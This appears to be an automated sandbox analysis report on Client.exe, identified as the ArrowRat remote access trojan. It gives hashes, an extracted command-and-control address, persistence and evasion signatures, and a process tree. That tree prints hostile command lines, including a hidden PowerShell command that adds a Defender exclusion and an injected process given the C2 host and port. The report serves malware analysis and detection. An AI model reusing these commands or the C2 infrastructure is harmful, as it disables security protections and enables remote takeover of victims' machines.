Overview

overview

10

Static

static

10

Client.exe

windows7-x64

10

Client.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    1799s
  • max time network
    1802s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-02-2023 11:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client.exe

  • Size

    157KB

  • MD5

    881c51282ebd1bcef1362dd4cd00aec3

  • SHA1

    6f701e0d16191e2a120bf24f873f74a167be5748

  • SHA256

    220f466224194d58d64f18ef376a0c4a7de07c93527070d7b357a708fb4293bf

  • SHA512

    57ff91504021d42079f4ffe0dbd6e185105e5c8a6bba11e20b864720f04243604d48b383ef5d93978ad7fe48e24e876305a374a994c7c5c6ab3303e4c0d97a7e

  • SSDEEP

    3072:+bR3+0O5VbFHexuiCrK0ovzNC0Fie+5cVjvn+sZCh8/QbNb68Y:+bRu0OLoxuiCNovpke+cvnOaQI8

Score
10/10
arrowratclientpersistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

194.ip.ply.gg:54552

Mutex

AbZfjNVtY

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 39 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 49 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    "C:\Users\Admin\AppData\Local\Temp\Client.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4052
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      2⤵
      • Modifies Installed Components in the registry
      • Enumerates connected drives
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3620
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 194.ip.ply.gg 54552 AbZfjNVtY
      2⤵
        PID:1304
      • C:\Windows\System32\ComputerDefaults.exe
        "C:\Windows\System32\ComputerDefaults.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3972
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\xjLsSeVeH\Client'
          3⤵
            PID:984
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        1⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:3812
      • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
        "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
        1⤵
        • Modifies registry class
        • Suspicious use of SetWindowsHookEx
        PID:916
      • C:\Windows\system32\DllHost.exe
        C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:984

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133218875731878852.txt
        Filesize

        75KB

        MD5

        e3417e64fd17fa01c90cf956829ca7ff

        SHA1

        f8960ede60ed71f3ca9f505556390518621393f6

        SHA256

        a55bc5d91308f7bb7cef9268f6333172653c4119c8641abcb0692116fecd860c

        SHA512

        3126805740cdea1d97c1887c0e0e33094b5e187d218f0b8b26c5305ed6aa1737d88a9434e3cfcec9bf1009c9a4fe53e441312e8c24171e08fad2eed0d08cf4a9

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qit5qncw.stp.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\temp0923
        Filesize

        10B

        MD5

        8981e4e4262b51696e68126e827966d6

        SHA1

        5220599dbcc127c57ef1646b45bf539a793c48e5

        SHA256

        3dbd2725bb191caefdc0a65a476cb15d75df95c8772149eb13d60b808b0707c6

        SHA512

        a493e970645f66b5cace7de4034d4f28908ab53f15a7b37f7d518c66a5fe7acf1ddfb48ca3a86325b3609e4154c8377f049d45f4a4a8d8cad54733ba8025b0d6

        Download Submit

      • memory/916-175-0x00000189CF1D0000-0x00000189CF1F0000-memory.dmp

        Filesize

        128KB

        Download

      • memory/916-177-0x00000189CF5E0000-0x00000189CF600000-memory.dmp

        Filesize

        128KB

        Download

      • memory/916-172-0x00000189CF210000-0x00000189CF230000-memory.dmp

        Filesize

        128KB

        Download

      • memory/984-153-0x000001C5FB7E0000-0x000001C5FB7F0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/984-142-0x000001C5FA030000-0x000001C5FA052000-memory.dmp

        Filesize

        136KB

        Download

      • memory/984-154-0x000001C5FB7E0000-0x000001C5FB7F0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1304-158-0x0000000006520000-0x0000000006570000-memory.dmp

        Filesize

        320KB

        Download

      • memory/1304-155-0x0000000005C60000-0x0000000005CC6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/1304-151-0x00000000054D0000-0x00000000054E0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1304-150-0x0000000005CE0000-0x0000000006284000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/1304-137-0x0000000005580000-0x000000000561C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/1304-136-0x00000000054E0000-0x0000000005572000-memory.dmp

        Filesize

        584KB

        Download

      • memory/1304-315-0x00000000054D0000-0x00000000054E0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/1304-134-0x0000000000400000-0x0000000000418000-memory.dmp

        Filesize

        96KB

        Download

      • memory/3620-166-0x0000000002FE0000-0x0000000002FE1000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4052-152-0x0000000000E80000-0x0000000000E90000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4052-133-0x00000000005D0000-0x00000000005FC000-memory.dmp

        Filesize

        176KB

        Download

      • memory/4052-316-0x0000000000E80000-0x0000000000E90000-memory.dmp

        Filesize

        64KB

        Download